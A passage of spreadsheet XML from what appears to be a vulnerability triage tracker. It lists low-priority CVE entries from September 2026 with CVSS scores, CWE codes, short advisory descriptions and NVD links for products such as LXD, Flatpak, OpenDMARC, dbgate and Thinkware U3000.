      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution in the recursive file pull feature of the LXD CLI client in Canonical LXD versions 4.0.2 up to 6.9 (fixed in 4.0.14, 5.0.10 and 5.21.8) on Linux allows an attacker with root access inside a virtual machine to write attacker-controlled files or directory trees to arbitrary paths on the client host, with the operator's privileges. The attacker does this by using a modified lxd-agent that returns inconsistent SFTP directory listings and Lstat results.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87798</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97029</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-653</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Flatpak's process ID namespace separation does not prevent a sandboxed app's kill(0, signal) or killpg(0, signal) calls from reaching processes outside the sandbox that share the same process group. A malicious or compromised Flatpak app can use this to cause denial of service by terminating processes outside its sandbox, such as the desktop shell.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97029</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15953</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@ch.abb.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ABB Protection and control IED manager (PCM600).
This issue affects Protection and control IED manager (PCM600): through 2.14.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15953</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70413</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-259</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>Dell Live Optics Collector, versions prior to 27.2.13.310, contain(s) a Use of Hard-coded Password vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70413</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94282</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in libXi's XI2 enter/leave/focus cookie conversion in libXi before 1.8.4 could be used by malicious X server to crash an attached X client.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94282</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101005</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in October CMS up to 4.3.4. This affects the function validateExternalImageHost of the file System/Classes/ResizeImages.php of the component SSRF Protection. The manipulation results in server-side request forgery. The attack may be launched remotely. The exploit is now public and may be used. Upgrading to version 4.3.5 is able to mitigate this issue. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101005</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101013</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected is an unknown function of the file updateresultdetails.php. Such manipulation of the argument editid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101013</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101014</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_util_cleanup in the library libopendmarc/opendmarc_util.c of the component DMARC Record Parser. Performing a manipulation results in off-by-one. The attack may be initiated remotely. The exploit is now public and may be used. The patch is named b3b1da9264bc80324094a27c71e7369bdedc62ae. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101014</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101016</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Trusted Domain Project OpenDMARC up to 1.4.2. This affects the function opendmarc_policy_parse_dmarc in the library libopendmarc/opendmarc_policy.c. The manipulation of the argument fo/rf/ri/pct/sp/adkim/aspf/rua/ruf leads to handling of exceptional conditions. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101016</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101017</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Trusted Domain Project OpenDMARC up to 1.4.2. This vulnerability affects the function strcasecmp in the library libopendmarc/opendmarc_policy.c. The manipulation results in handling of exceptional conditions. The attack can be executed remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101017</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101035</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in aligungr UERANSIM up to 3.3.0. This affects the function DecodePlainMmMessage in the library src/lib/nas/encode.cpp of the component nr-gnb. Executing a manipulation can lead to uncaught exception. The attack can be launched remotely. The exploit has been published and may be used. This patch is called 1ae9bf2062b57595dbcbc4bc1d0a0ccf06815bac. It is best practice to apply a patch to resolve this issue.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101035</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101052</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in refly-ai refly up to 1.1.0. This issue affects some unknown processing of the file apps/api/src/modules/config/app.config.ts of the component JWT Token Handler. The manipulation with the input test leads to hard-coded credentials. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101052</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101053</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Thinkware U3000 up to 1.02.04. This impacts the function PUT_FILE of the file /tmp/wpa_supplicant.conf of the component TCP Service. Executing a manipulation of the argument path can lead to improper access controls. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101053</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101055</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Thinkware U3000 up to 1.02.04. Affected by this vulnerability is the function GET_STATUS of the component TCP Service. The manipulation of the argument wifi_info results in information disclosure. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101055</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101068</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in dbgate up to 7.3.1. This impacts the function zipJsonLinesData of the file packages/api/src/utility/zipJsonLinesData.js of the component Create Connection Endpoint. Performing a manipulation of the argument filePath results in path traversal. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. PR #1530 / commit 5f99b4d82 (7.2.5) hardened other export endpoints with checkSecureExportFilePath but omitted this endpoint. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101068</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101069</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in dbgate up to 7.3.1. Affected is the function exportModelSql of the file packages/api/src/controllers/databaseConnections.js of the component Export Handler. Executing a manipulation of the argument outputFile can lead to path traversal. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101069</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102005</t>
